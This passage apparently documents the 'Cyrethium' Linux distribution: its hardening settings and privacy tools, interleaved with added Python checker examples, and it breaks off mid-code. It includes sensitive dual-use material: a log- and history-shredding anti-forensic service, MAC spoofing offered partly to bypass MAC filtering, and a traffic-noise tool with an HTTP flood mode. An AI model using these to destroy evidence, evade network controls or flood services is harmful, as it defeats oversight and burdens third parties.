By deleting this map in Cyrethium, access to kernel symbols from user space is prevented. This makes it difficult for the attacker to learn which kernel functions are located at which addresses, especially during local attacks or exploitation attempts. As a result, the chance of success of kernel-level exploits decreases and the system's resistance to attacks increases.

2. Reproducible Initramfs

dracut.conf.d: reproducible=yes

Initramfs is produced identically at the byte level at each boot. This is important for verifying image integrity and detecting malicious changes. Unexpected changes in the system are more easily noticed, indirectly increasing security.

3. umask 027

Bash scripts added to the /etc/profile.d/ directory in Cyrethium are executed when the user session starts and configure the environment system-wide. The umask 027 setting used here determines the default permissions of newly created files and directories; for files, permission becomes 640, meaning only the file owner can read and write, group members can only read, other users cannot access. For directories, permission becomes 750, meaning the owner has full authority, group members can read and execute, other users cannot access.

This increases the security of files and directories in the system, prevents unauthorized users from accessing critical files, and provides a default security level at startup, especially in multi-user systems.

4. Permission Hardening Service

The "Permission Hardening" service in Cyrethium increases security by strictly controlling the permissions and ownership of critical files and directories in the system at each boot. For this purpose, specific permissions are assigned to basic system files such as /etc/passwd, /etc/shadow, /etc/group, /etc/gshadow, and /etc/sudoers; for example, the /etc/shadow file can only be read and written by root (600), so user passwords cannot be accessed by unauthorized persons.

Similarly, critical directories are also protected; the /root directory gives full access only to root, while directories like /var/log and /boot are set with broader but controlled access (750 or 755), so system logs and boot files are not changed or deleted by unauthorized users. This structure protects system integrity, minimizes unauthorized access and possible attack surface, and provides a balanced environment between security and accessibility in daily use.
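The umask arithmetic in section 3 and the per-boot permission audit in section 4, as an added Python example that is not Cyrethium's own service code: it shows the 640/750 modes that umask 027 produces and audits a list of critical paths against expected modes, optionally fixing them. The mode for /etc/shadow and the root-only /root and 750/755 choices come from the text above; the values for /etc/passwd, /etc/group, /etc/gshadow and /etc/sudoers, and the staging tree used by the self-check, are assumptions made for this example.

```python
import os
import stat
import tempfile

# Modes the hardening service is described as enforcing. /etc/shadow (600),
# /root (root only) and /var/log, /boot (750 or 755) come from the page; the
# remaining values are assumptions chosen for this example.
EXPECTED_MODES = {
    "/etc/passwd": 0o644,   # assumption
    "/etc/group": 0o644,    # assumption
    "/etc/shadow": 0o600,   # page: readable and writable by root only
    "/etc/gshadow": 0o600,  # assumption
    "/etc/sudoers": 0o440,  # assumption
    "/root": 0o700,         # page: full access only for root
    "/var/log": 0o755,      # page: 750 or 755
    "/boot": 0o755,         # page: 750 or 755
}


def audit_permissions(expected, root_prefix="", check_owner=True):
    """Return (path, expected_mode, actual_mode, uid) for each entry whose mode
    differs or, when check_owner is set, that is not owned by root (uid 0).
    Missing paths are skipped. root_prefix points the audit at a staging tree
    instead of the live filesystem."""
    findings = []
    for path, want in expected.items():
        try:
            st = os.lstat(root_prefix + path)
        except FileNotFoundError:
            continue
        actual = stat.S_IMODE(st.st_mode)
        if actual != want or (check_owner and st.st_uid != 0):
            findings.append((path, want, actual, st.st_uid))
    return findings


def harden_permissions(expected, root_prefix="", check_owner=True, apply=False):
    """Audit and, if apply is True, chmod every mismatching path to its expected
    mode (ownership is reported but not changed here). Returns the findings."""
    findings = audit_permissions(expected, root_prefix, check_owner)
    if apply:
        for path, want, _actual, _uid in findings:
            os.chmod(root_prefix + path, want)
    return findings


def umask_demo(mask=0o027):
    """Create a file (requested 666) and a directory (requested 777) under mask
    and return the modes that result: (0o640, 0o750) for umask 027."""
    old = os.umask(mask)
    try:
        with tempfile.TemporaryDirectory() as tmp:
            fpath, dpath = os.path.join(tmp, "f"), os.path.join(tmp, "d")
            os.close(os.open(fpath, os.O_CREAT | os.O_WRONLY, 0o666))
            os.mkdir(dpath, 0o777)
            return (stat.S_IMODE(os.stat(fpath).st_mode),
                    stat.S_IMODE(os.stat(dpath).st_mode))
    finally:
        os.umask(old)


def selfcheck():
    """Run the audit against a constructed staging tree, never the live system:
    a 'shadow' left world-readable is flagged, then fixed. Returns (before, after)."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(tmp + "/etc")
        for name in ("/etc/passwd", "/etc/shadow"):
            with open(tmp + name, "w") as fh:
                fh.write("constructed sample, not a real account database\n")
            os.chmod(tmp + name, 0o644)   # both world-readable: wrong for shadow
        before = harden_permissions(EXPECTED_MODES, tmp, check_owner=False, apply=True)
        after = audit_permissions(EXPECTED_MODES, tmp, check_owner=False)
    return before, after


if __name__ == "__main__":
    print("umask 027 gives file/dir modes: %o %o" % umask_demo())
    for path, want, actual, uid in audit_permissions(EXPECTED_MODES):
        print(f"{path}: expected {want:o}, found {actual:o} (uid {uid})")
```

Run as a normal user the live audit only reports; applying fixes to /etc requires root, which is why the service runs at boot.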

5. Bluetooth Hardening

"Bluetooth Hardening" settings in Cyrethium ensure that Bluetooth devices are protected against unauthorized access and data leaks. The system limits pairing and discoverability times; for example, PairableTimeout and DiscoverableTimeout values are set to 30 seconds, so the device does not remain open to pairing or discovery for long periods.

MaxControllers=1 assigns only one Bluetooth controller to the system and strictly restricts device management. With TemporaryTimeout=0, temporary devices are not retained indefinitely, so unused or temporary devices are cleaned up automatically. AutoEnable=false does not enable Bluetooth adapters automatically; they are turned on only under user control. Additionally, thanks to the Privacy=network/on policy, the device accepts advertisement packets only from other devices using private addresses, which prevents the device's location and identity from being tracked by unauthorized persons.

These settings strengthen the system against attacks that may come through Bluetooth and increase user privacy.

6. Git Configuration Security

Git security hardening settings in Cyrethium are configured to reduce possible risks in source code management and ensure data integrity. In the [core] section, the symlinks = false setting disables symbolic links in Git repositories; this protects the system against malicious file or link attacks. In the [transfer], [fetch] and [receive] sections, fsckobjects = true makes integrity checks mandatory in all data transfers and received objects; thus corrupted or modified objects are detected and rejected.

Some advanced security measures, such as gpgsign = true or verifySignatures = true, are not enabled by default because they require users to have local signing keys and knowingly manage commit processes; otherwise Git operations may fail in normal use. Similarly, SSH-based URL redirections are also left closed by default because they may disrupt user experience. These settings increase Git's security, guarantee data integrity, and provide additional protection against malicious interference.
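An added example, not Cyrethium's own configuration or code, that checks a BlueZ main.conf and a gitconfig for the settings described in sections 5 and 6 above and reports any that are missing or differ. The placement of the Bluetooth keys in [General] and [Policy] follows BlueZ's layout as I know it and is an assumption, as are the sample files.

```python
import configparser

# Hardened values the page describes for /etc/bluetooth/main.conf. Section
# placement follows BlueZ's layout as I know it (AutoEnable under [Policy],
# the rest under [General]) and should be treated as an assumption.
BLUETOOTH_EXPECTED = {
    ("General", "PairableTimeout"): "30",
    ("General", "DiscoverableTimeout"): "30",
    ("General", "MaxControllers"): "1",
    ("General", "TemporaryTimeout"): "0",
    ("General", "Privacy"): "network/on",
    ("Policy", "AutoEnable"): "false",
}

# The git settings the page enables; gpgsign/verifySignatures are deliberately absent.
GIT_EXPECTED = {
    ("core", "symlinks"): "false",
    ("transfer", "fsckobjects"): "true",
    ("fetch", "fsckobjects"): "true",
    ("receive", "fsckobjects"): "true",
}


def check_config(text, expected):
    """Return (section, key, expected, actual) for every expected setting that is
    missing (actual None) or differs, comparing case-insensitively. An empty list
    means the file carries the hardened values."""
    # Both files are INI-style; interpolation is off so a '%' in a value is literal.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings = []
    for (section, key), want in expected.items():
        actual = cp.get(section, key).strip() if cp.has_option(section, key) else None
        if actual is None or actual.lower() != want.lower():
            findings.append((section, key, want, actual))
    return findings


def check_file(path, expected):
    with open(path, encoding="utf-8") as fh:
        return check_config(fh.read(), expected)


# Constructed samples for illustration, not files shipped by Cyrethium.
STOCK_BLUETOOTH = """\
[General]
DiscoverableTimeout = 0
PairableTimeout = 0
Privacy = off

[Policy]
AutoEnable=true
"""

HARDENED_BLUETOOTH = """\
[General]
PairableTimeout = 30
DiscoverableTimeout = 30
MaxControllers = 1
TemporaryTimeout = 0
Privacy = network/on

[Policy]
AutoEnable = false
"""

HARDENED_GIT = """\
[core]
\tsymlinks = false
[transfer]
\tfsckobjects = true
[fetch]
\tfsckobjects = true
[receive]
\tfsckobjects = true
"""

if __name__ == "__main__":
    for label, text in (("stock", STOCK_BLUETOOTH), ("hardened", HARDENED_BLUETOOTH)):
        print(label, check_config(text, BLUETOOTH_EXPECTED))
    print("git", check_config(HARDENED_GIT, GIT_EXPECTED))
```

On a live system, pass /etc/bluetooth/main.conf and /etc/gitconfig (or ~/.gitconfig) to check_file.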

7. APT Settings

APT security hardening settings in Cyrethium are configured to increase system security during package management and prevent possible malicious package attacks. With the APT::Update::Error-Mode any; setting, the process does not stop in case of any error during package updates, so the package manager is more resilient and tolerant of errors. With APT::Sandbox::Seccomp "true"; APT operations run in a sandbox environment and system calls (syscalls) are filtered; this prevents malicious code from doing damage at the kernel level during package installation and updates.

8. Sudoers Configuration

The sudoers file in Cyrethium is configured to prevent unauthorized users from having root privileges and increase system security.

9. MTU Configuration

When using Tor, TCP packets traverse multiple nodes, and each node may have a slightly different Maximum Transmission Unit (MTU). If the MTU is not properly aligned, packets can become fragmented, leading to increased latency, slower connections, or even dropped packets. Setting net.ipv4.tcp_mtu_probing = 1 enables the Linux kernel to automatically probe and detect the appropriate MTU whenever packet loss occurs. This helps ensure that TCP packets sent through the Tor network are transmitted efficiently and without fragmentation, improving connection stability and overall performance (/etc/sysctl.d/pmtud.conf).

Additional Notes

Some hardening settings in Cyrethium are taken from Kicksecure and customized for a more seamless experience in daily use.

AppArmor

Cyrethium uses Debian's AppArmor by default. AppArmor is not active in live systems. This is not related to Cyrethium. AppArmor becomes active when the system is installed. Also, some of Cyrethium's custom tools have their own AppArmor profiles.

What is AppArmor and what does it do?

AppArmor is a security tool that works as a Mandatory Access Control (MAC) system on Linux and restricts applications. It creates profiles that determine which files, network resources, and system components each application can access and prevents applications from going beyond these limits. Thus, even if an application has a vulnerability, it is prevented from damaging the entire system and the attack surface is reduced.

AppArmor increases security by isolating applications from each other and enables detection of misbehaving programs through logs. It offers a structure that is not as complex as SELinux; administrators can easily create profiles and control which applications can access which resources. In general, AppArmor serves as a security armor that protects the Linux system and puts applications in "small cages."

AppArmor Profiles

Cyrethium has pre-configured AppArmor profiles:

  • Cyrethonion
  • Cyrethonion-Mate
  • Paranoia
  • Change Mac
  • Change Hostname

# Check AppArmor status
sudo aa-status

Anti-Forensic Settings Manager

Anti-Forensic Settings Manager is a tool that manages automatic cleanup services during system shutdown. It securely cleans logs, swap, and temporary files for privacy and anti-forensic purposes.

Features

Cleanup Services

  • cyrethium-cleanup-logs: Securely deletes system logs
  • cyrethium-cleanup-swap: Overwrites swap memory with random data
  • cyrethium-cleanup-temp: Cleans temporary files and caches

Management Features

  • Enable/disable all services
  • Individual service management
  • Service status display
  • Detailed service information

Usage

anti-forensic

Note: Run as normal user, sudo will be used when needed.

Main Menu

1. Enable All Services

Enables all cleanup services.

Enabled Services: cyrethium-cleanup-logs, cyrethium-cleanup-swap, cyrethium-cleanup-temp

2. Disable All Services

Disables all cleanup services.

3. Manage Individual Services

Manage services individually. View status, disable active service, or enable disabled service.

4. Show Service Information

Shows detailed information about each service.

Service Details

cyrethium-cleanup-logs

Description: Securely deletes system logs

Cleaned Files: /var/log/*, /var/log/auth.log, /var/log/syslog, ~/.bash_history, ~/.local/share/recently-used.xbel

Features: Secure deletion (shred), cleans user bash histories, deletes recently used file lists

cyrethium-cleanup-swap

Description: Overwrites swap memory with random data

Process: Detects swap areas → Disables swap → Overwrites with random data → Re-enables swap

Features: Prevents recovery of sensitive data from swap, minimal shutdown time impact, secure data destruction

cyrethium-cleanup-temp

Description: Cleans temporary files and caches

Cleaned Areas: /tmp/*, /var/tmp/*, ~/.cache/*, ~/.thumbnails/*, Browser data (Firefox, Chrome, Brave)

Features: Removes user activity traces, cleans browser caches, deletes thumbnail caches

Usage Examples

# Example 1: Enable All Services
1. Start anti-forensic
2. Select "1" (Enable all services)
3. All services enabled

# Example 2: Log Cleanup Only
1. Start anti-forensic
2. Select "3" (Manage individual services)
3. Select "1" (cyrethium-cleanup-logs)
4. Confirm with "y"

# Example 3: Check Service Status
Service statuses shown in main menu:
- Active & Enabled (Green)
- Enabled (Inactive) (Yellow)
- Disabled (Red)

Performance Impact

Shutdown Time: Normal ~5s, With Services ~10-20s

Time Distribution: Log cleanup 2-5s, Swap cleanup 3-10s, Temp cleanup 2-5s

Disk Usage: Logs 100MB-1GB, Temp 500MB-5GB, Swap data recovery prevented

Troubleshooting

Service Cannot Be Enabled: Run sudo systemctl daemon-reload and try again, or start services manually

Shutdown Takes Too Long: Disable swap cleanup, it's the longest running process

FAQ

Q: When do services run? A: Automatically during system shutdown.

Q: What if I cancel shutdown? A: Services won't run, data won't be cleaned.

Q: Should I enable all? A: Yes if privacy is priority, be selective if performance matters.

Q: Can data be recovered? A: No, shred and random data writing make recovery impossible.

Q: Works on SSD? A: Yes, but not 100% guaranteed due to wear leveling.

Q: Fast shutdown mode? A: No, all processes must complete for security.

Recommendations: Privacy critical = All services, Performance important = Only logs and temp, No swap usage = Disable swap cleanup

Security Notes

Important Warnings:

  1. Data Loss: Cleaned data cannot be recovered
  2. Log Analysis: System logs deleted, troubleshooting may be harder
  3. Forensic Analysis: Anti-forensic purpose, legal responsibility is yours

Change-MAC

Change-MAC is a tool designed to change and restore MAC addresses of network interfaces. It provides secure and easy MAC address management using macchanger.

Usage

sudo change-mac

Note: Root privileges required.

Main Menu

1. Change MAC Address

Changes MAC address.

Steps: Select network interface → Select change type (Random MAC, Random Keep Vendor, Custom MAC) → Change is applied

2. Revert MAC Address

Restores the MAC address to the original. Requires the backup file, and the interface must have been changed before.

3. Show Current Status

Shows status of all network interfaces: Interface name, Current MAC, Original MAC, Status (UP/DOWN)

4. Exit

Exits the program.

MAC Changing Types

1. Random MAC Address: Creates a completely random MAC address

2. Random MAC (Keep Vendor): Creates random MAC while keeping vendor part

3. Custom MAC Address: User-defined MAC address

MAC Address Format

OUI (First 3 Bytes): Identifies manufacturer, assigned by IEEE. Example: 00:11:22 = Cisco

Device ID (Last 3 Bytes): Device specific, assigned by manufacturer

Backup File: /var/lib/change-mac/original_macs.conf
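As an added example (not the change-mac tool's code), a Python helper that splits a MAC into OUI and device id, decodes the two flag bits a network can inspect to notice a changed address, validates a user-entered custom MAC, and produces random addresses in the two styles listed above. The iface:MAC backup-line format is assumed from the troubleshooting one-liner later in this section.

```python
import re
import secrets

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5}$")


def parse_mac(text):
    """Return the six octets of aa:bb:cc:dd:ee:ff (or aa-bb-...) as ints; None if malformed."""
    if not MAC_RE.match(text):
        return None
    return [int(part, 16) for part in re.split(r"[:-]", text)]


def describe_mac(text):
    """Split a MAC into OUI and device id and decode the two flag bits of the first octet."""
    octets = parse_mac(text)
    if octets is None:
        return None
    first = octets[0]
    return {
        "oui": ":".join(f"{o:02X}" for o in octets[:3]),        # IEEE-assigned vendor prefix
        "device_id": ":".join(f"{o:02X}" for o in octets[3:]),  # vendor-assigned part
        "multicast": bool(first & 0x01),             # I/G bit: a device address has it clear
        "locally_administered": bool(first & 0x02),  # U/L bit: set means not an IEEE OUI,
    }                                                # which is how a network can spot a changed MAC


def validate_custom_mac(text):
    """Check a user-entered 'Custom MAC': well-formed and unicast. Returns (ok, reason)."""
    info = describe_mac(text)
    if info is None:
        return False, "malformed"
    if info["multicast"]:
        return False, "multicast bit set"
    return True, "ok"


def random_mac(keep_oui_from=None):
    """'Random MAC' sets the locally-administered bit and clears the multicast bit;
    'Random (Keep Vendor)' keeps the OUI of keep_oui_from and randomises only the device id."""
    if keep_oui_from is not None:
        octets = parse_mac(keep_oui_from)
        if octets is None:
            raise ValueError("keep_oui_from is not a valid MAC")
        octets = octets[:3] + list(secrets.token_bytes(3))
    else:
        octets = list(secrets.token_bytes(6))
        octets[0] = (octets[0] | 0x02) & 0xFE
    return ":".join(f"{o:02x}" for o in octets)


def backup_line(iface, mac):
    """One line of original_macs.conf in the assumed iface:MAC form."""
    return f"{iface}:{mac}"


def parse_backup(text):
    """Inverse of backup_line for a whole file: {iface: original MAC}."""
    return dict(line.split(":", 1) for line in text.splitlines() if line.strip())
```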

Usage Examples

# Example 1: WiFi Card MAC Change
1. sudo change-mac
2. Select "1" (Change MAC Address)
3. Select wlan0
4. Select "1" (Random MAC)
5. MAC changed!

# Example 2: Ethernet MAC Restore
1. sudo change-mac
2. Select "2" (Revert MAC Address)
3. Select eth0
4. Original MAC restored!

# Example 3: Custom MAC Address
1. sudo change-mac
2. Select "1"
3. Select interface
4. Select "3" (Custom MAC)
5. Enter MAC: 00:AA:BB:CC:DD:EE
6. Custom MAC applied!

# Example 4: Status Check
sudo change-mac > 3 (Show Current Status)
Interface: eth0
Current MAC: A8:7B:3C:9D:E2:F1
Original MAC: 00:11:22:33:44:55
Status: UP

Security and Privacy

Why Change MAC?

1. Privacy: MAC address can identify you, prevents network tracking, provides location privacy

2. Security: MAC filtering bypass, protection from network attacks, testing and penetration testing

3. Anonymous Connection: Public WiFi usage, connecting to different networks, identity concealment

Best Practices

# 1. Regular Changes - On every network change
sudo change-mac > Random MAC

# 2. Vendor Protection - For compatibility
sudo change-mac > Random (Keep Vendor)

# 3. Backup - Note original MAC
ip link show eth0
# or
macchanger -s eth0

Troubleshooting

Macchanger Not Installed

sudo apt install macchanger

Interface Cannot Be Brought Down

sudo systemctl stop NetworkManager
sudo change-mac
sudo systemctl start NetworkManager

MAC Not Changing

sudo ip link set eth0 down
sudo change-mac
sudo ip link set eth0 up

No Backup File

sudo mkdir -p /var/lib/change-mac
echo "eth0:$(ip link show eth0 | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' | head -1)" | sudo tee -a /var/lib/change-mac/original_macs.conf

Network Connection Lost

sudo systemctl restart NetworkManager
sudo dhclient -r
sudo dhclient

FAQ

Q: Is MAC change permanent? A: No, original MAC returns after system reboot.

Q: Works on all network cards? A: Works on most, but some hardware doesn't support MAC changes.

Q: Why is vendor part important? A: Some networks only allow devices from specific manufacturers.

Q: Random MAC different each time? A: Yes, new random MAC generated each run.

Q: How to learn original MAC? A: From backup file or hardware label.

Q: Can change multiple interfaces? A: Yes, each interface separately.

Security Notes

Important Warnings:

  1. Network Rules: Some networks can detect MAC changes
  2. Legal Responsibility: Misuse is illegal
  3. Connection Loss: Connection drops during change

Tips: Note original MAC, change when no network traffic

ChangeHostname

ChangeHostname is an interactive tool designed to change and manage system hostname. It offers manual and automatic hostname generation options.

Usage

sudo changehostname

Note: Root privileges required.

Main Menu

1. Change Hostname Manually

Enter hostname manually.

Rules: Must start and end with alphanumeric character, can have hyphens (-) in middle, maximum 63 characters, no spaces or special characters

2. Generate Random Hostname

Generates random hostname.

Options:

  • Animal-based (ex: dark-wolf-042)
  • Tech-themed (ex: cyber-node-15)
  • Game-themed (ex: aatrox-diablo-37)
  • Anime-themed (ex: zaraki-kenpachi-042)
  • Pure Random (ex: host-a7b9c3d2)
  • Codename Style (ex: ghost-black-07)
  • Generate Multiple Options

3. Show Current Hostname Info

Shows current hostname information: Hostname, FQDN (Fully Qualified Domain Name), Domain, IP Address

4. Create Hostname Backup

Backs up current hostname. Backup Location: /etc/hostname.backup

5. Restore Hostname from Backup

Restores hostname from backup.

6. Hostname History

Shows hostname change history. Log File: /var/log/hostname.log

Troubleshooting

Hostname Not Changing

# Reload systemd
sudo systemctl daemon-reload

# Check hostname manually
hostname
cat /etc/hostname

/etc/hosts Error

# Manually edit /etc/hosts
sudo nano /etc/hosts

# Find old hostname and change
127.0.1.1    old-hostname
# Change to:
127.0.1.1    new-hostname

Invalid Hostname

Valid formats: my-server, web01, database-prod

Invalid formats: -server (starts with hyphen), my_server (underscore), server- (ends with hyphen), my server (space)

No Backup File

# Create manual backup
sudo cp /etc/hostname /etc/hostname.backup

FAQ

Q: Is hostname change permanent? A: Yes, persists after system reboot.

Q: Reboot required? A: No, but some applications should be restarted. A general reboot is healthier.

Q: What is FQDN? A: Fully Qualified Domain Name (e.g., server.example.com)

Q: Maximum hostname length? A: 63 characters.

Q: How to view hostname history? A: Use menu option "6" or check /var/log/hostname.log

Q: Can use multiple hostnames? A: No, only one hostname can be active at a time.

Security and Privacy

Why Change Hostname?

1. Privacy: Default hostnames can cause information leakage, random hostnames make tracking harder

2. Security: Predictable hostnames can be targets, random names mislead attackers

Security Notes

Important: Hostname visible on network, should not contain sensitive information, regular changes increase privacy

Chaosec - Traffic Obfuscation Tool

Chaosec is a security tool designed to protect against MITM (Man-in-the-Middle) attacks and traffic analysis. It creates fake traffic to hide your real traffic and makes traffic analysis difficult.

IMPORTANT ETHICAL WARNING

This Tool is a SECURITY TOOL

Chaosec is designed to protect against MITM attacks and traffic analysis.

LONG-TERM USAGE WARNING

  • Long-term use may be detected as DoS/DDoS attack activity
  • Your IP address may be blocked or blacklisted
  • Your ISP may suspend your account
  • Legal investigation may be initiated
  • You may encounter CAPTCHA or rate limiting from websites

AUTHORIZED USES

  • Legitimate privacy protection
  • Authorized security research
  • Network testing on your own infrastructure
  • Learning in controlled training environments

PROHIBITED USES

  • DoS/DDoS attacks
  • Overwhelming third-party services
  • Bypassing legal restrictions
  • Malicious or illegal activities

AUTOMATIC STOP

This tool runs for a maximum of 5 minutes and stops automatically. This duration is limited for security reasons.

By using this tool, you accept all responsibility. Authors are not responsible for misuse or resulting damages.

Features

Traffic Obfuscation Techniques

  • DNS Noise: Creates random DNS queries
  • HTTP Traffic: Legitimate-looking HTTP requests
  • TCP Connections: Random TCP connections
  • UDP Packets: Random UDP packets

Traffic Patterns

  • Browsing: Normal web browsing pattern
  • Streaming: Video/audio streaming pattern
  • Gaming: Online gaming traffic pattern
  • Chaotic: Maximum chaos mode - all traffic types
  • Stealth: Low-profile stealth mode
  • Research: Academic/research browsing pattern
  • Social: Social media usage pattern

Configuration

  • Customizable intensity (0.1-10.0x)
  • Tor network optimization
  • Custom domain addition
  • Statistics tracking
  • Automatic security limits

How It Works

Traffic Obfuscation Mechanism: Chaosec creates fake traffic to hide your real traffic:

  1. Real Traffic + Fake Traffic = Analysis Difficulty
  2. Attackers cannot distinguish which traffic is real
  3. Traffic analysis becomes difficult
  4. MITM attacks become ineffective

Example Scenario

Attacker monitoring your traffic:

Real: youtube.com (Your real activity)
Fake: wikipedia.org (Chaosec)
Fake: github.com (Chaosec)
Fake: mozilla.org (Chaosec)
Real: email.com (Your real activity)
Fake: python.org (Chaosec)
Fake: debian.org (Chaosec)

Attacker cannot tell which traffic is real!

Usage

Basic Usage

# DNS and HTTP noise
chaosec --dns-noise --http-flood

# All traffic types
chaosec --all-noise

# With specific pattern
chaosec --all-noise --pattern browsing

# High intensity
chaosec --all-noise --intensity 2.0

Traffic Patterns

# Normal web browsing
chaosec --all-noise --pattern browsing

# Video streaming
chaosec --all-noise --pattern streaming

# Online gaming
chaosec --all-noise --pattern gaming

# Maximum chaos
chaosec --all-noise --pattern chaotic

# Stealth mode
chaosec --all-noise --pattern stealth

# Research
chaosec --all-noise --pattern research

# Social media
chaosec --all-noise --pattern social

Tor Mode

# Optimized for Tor network
chaosec --all-noise --tor-mode --pattern browsing

In Tor mode: Minimum wait time 1 second, Tor-appropriate traffic patterns, less aggressive requests

Intensity Setting

# Low intensity (0.5x)
chaosec --all-noise --intensity 0.5

# Normal intensity (1.0x - default)
chaosec --all-noise --intensity 1.0

# High intensity (2.0x)
chaosec --all-noise --intensity 2.0

# Maximum intensity (10.0x)
chaosec --all-noise --intensity 10.0

Command Line Options

Traffic Generators

  • --dns-noise: Create random DNS queries
  • --http-flood: Create random HTTP requests
  • --tcp-noise: Create random TCP connections
  • --udp-noise: Create random UDP packets
  • --all-noise: Enable all traffic generators

Configuration

  • --intensity FLOAT: Traffic intensity multiplier (0.1-10.0)
  • --tor-mode: Optimize for Tor network
  • --duration INT: Run duration (minutes, max 5)
  • --verbose, -v: Verbose output and statistics

Traffic Pattern Details

1. Browsing (Web Browsing)

Description: Simulates normal web browsing behavior

Features: HTTP 60%, DNS 30%, TCP 10%, UDP 5%, Interval 1-8 seconds

Use Case: Hide daily web browsing activities

2. Streaming

Description: Simulates video/audio streaming traffic

Features: HTTP 80%, DNS 10%, TCP 5%, UDP 20%, Interval 0.5-2 seconds

Use Case: Hide video watching or music listening activities

3. Gaming

Description: Simulates online gaming traffic

Features: HTTP 20%, DNS 10%, TCP 30%, UDP 50%, Interval 0.1-1 second

Use Case: Hide online gaming activities

4. Chaotic

Description: Maximum chaos mode - all traffic types

Features: HTTP 100%, DNS 100%, TCP 100%, UDP 100%, Interval 0.1-0.5 seconds

Use Case: Maximum privacy, traffic analysis completely difficult

WARNING: Most aggressive mode, use carefully!

5. Stealth

Description: Low-profile stealth mode

Features: HTTP 40%, DNS 20%, TCP 5%, UDP 2%, Interval 5-30 seconds

Use Case: Provide privacy without being noticed

Troubleshooting

Program Stops Immediately

Problem: Program stops right after starting

Solution: Select at least one traffic generator: chaosec --dns-noise --http-flood or chaosec --all-noise

Connection Errors

Problem: "Connection refused" or "Timeout" errors

Solution: This is normal. Some servers may refuse connections. Program continues automatically. Don't worry.

High CPU Usage

Problem: CPU usage too high

Solution: Reduce intensity: chaosec --all-noise --intensity 0.5 or use fewer traffic types

IP Blocked

Problem: Some sites blocked your IP

Solution: This is normal when the tool is used aggressively. Reduce the intensity, use stealth mode, or use it with Tor.

Limitations

  • Maximum Runtime: 5 minutes maximum, automatic stop, limited for security
  • Intensity Limits: Minimum 0.1x, Maximum 10.0x, Recommended 0.5-2.0x
  • Network Bandwidth: Uses bandwidth at high intensity, may consume internet quota, use carefully
  • ISP Policies: Some ISPs may block aggressive traffic, may apply rate limiting, may suspend your account

FAQ

Q: Is Chaosec legal? A: Legal to use for your own privacy. But DoS/DDoS attacks are illegal.

Q: Will my ISP notice? A: May notice at high intensity. Use stealth mode and low intensity.

Q: Should I use with Tor? A: Yes, recommended to use with Tor. Use --tor-mode.

Q: How long should I run it? A: Maximum 5 minutes. Shorter durations are safer.

Q: Does it really work? A: Yes, makes traffic analysis difficult. But doesn't provide 100% protection.

Q: Can I use with VPN? A: Yes, VPN + Chaosec is a good combination.

Q: Why 5 minute limit? A: For security. Prevents detection as DoS/DDoS.

Disclaimer

IMPORTANT WARNINGS:

  1. This tool is for legitimate privacy protection only
  2. DO NOT USE for DoS/DDoS attacks
  3. Do not run for long periods (max 5 minutes)
  4. Comply with ISP policies
  5. Legal responsibility is yours

Authors' Responsibility: Authors not responsible for misuse, user responsible for legal issues, tool provided "AS IS", no warranty given

USE ONLY WHEN NECESSARY! STAY SAFE!

Cryptocurrency Tools

Cyrethium offers various security and utility tools for cryptocurrency transactions.

Address Validator

Validates cryptocurrency addresses and performs format checks.

Supported Coins: Bitcoin (Base58 and Bech32/Bech32m), Ethereum (EIP-55 checksum), Litecoin

address-validator

Features: Bitcoin SegWit (bc1) support, Ethereum EIP-55 checksum validation, Testnet address support, Detailed error messages
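An added, stdlib-only Python example (not the address-validator tool's code) of the checks the tool is described as doing for Bitcoin and Litecoin: Base58Check with its double-SHA-256 checksum and version byte, and Bech32/Bech32m with the BIP173/BIP350 witness-version rules. The version-byte and HRP tables are assumptions for the example, and Ethereum is reduced to a format check because EIP-55 needs keccak-256, which hashlib does not provide.

```python
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
BECH32M_CONST = 0x2bc830a3
# Version byte / human-readable-part tables assumed for this example (BTC and LTC only).
B58_VERSIONS = {
    0x00: ("bitcoin", "p2pkh", "mainnet"), 0x05: ("bitcoin", "p2sh", "mainnet"),
    0x6f: ("bitcoin", "p2pkh", "testnet"), 0xc4: ("bitcoin", "p2sh", "testnet"),
    0x30: ("litecoin", "p2pkh", "mainnet"), 0x32: ("litecoin", "p2sh", "mainnet"),
}
BECH32_HRPS = {"bc": ("bitcoin", "mainnet"), "tb": ("bitcoin", "testnet"),
               "ltc": ("litecoin", "mainnet"), "tltc": ("litecoin", "testnet")}


def base58check_decode(addr):
    """Return (version, payload) if the Base58Check checksum verifies, else None."""
    if any(ch not in B58_ALPHABET for ch in addr):
        return None                      # 0, O, I and l are not in the alphabet
    n = 0
    for ch in addr:
        n = n * 58 + B58_ALPHABET.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading = len(addr) - len(addr.lstrip("1"))   # each leading '1' is a zero byte
    raw = b"\x00" * leading + body
    if len(raw) != 25 or hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()[:4] != raw[21:]:
        return None
    return raw[0], raw[1:21]


def bech32_polymod(values):
    gen = [0x3b6a57b2, 0x26508e6d, 0x1ea119fa, 0x3d4233dd, 0x2a1462b3]
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1ffffff) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= gen[i]
    return chk


def bech32_decode(addr):
    """Return (hrp, data_values, 'bech32'|'bech32m') or None (BIP173/BIP350 rules)."""
    if addr != addr.lower() and addr != addr.upper():
        return None                      # mixed case is invalid
    addr = addr.lower()
    pos = addr.rfind("1")
    if pos < 1 or pos + 7 > len(addr) or len(addr) > 90:
        return None
    hrp, body = addr[:pos], addr[pos + 1:]
    if any(c not in BECH32_CHARSET for c in body):
        return None
    data = [BECH32_CHARSET.index(c) for c in body]
    hrp_exp = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    const = bech32_polymod(hrp_exp + data)
    if const == 1:
        return hrp, data[:-6], "bech32"
    if const == BECH32M_CONST:
        return hrp, data[:-6], "bech32m"
    return None


def convertbits(data, frombits, tobits):
    """Regroup 5-bit symbols into bytes without padding; None if the padding is malformed."""
    acc = bits = 0
    out, maxv = [], (1 << tobits) - 1
    for value in data:
        acc = (acc << frombits) | value
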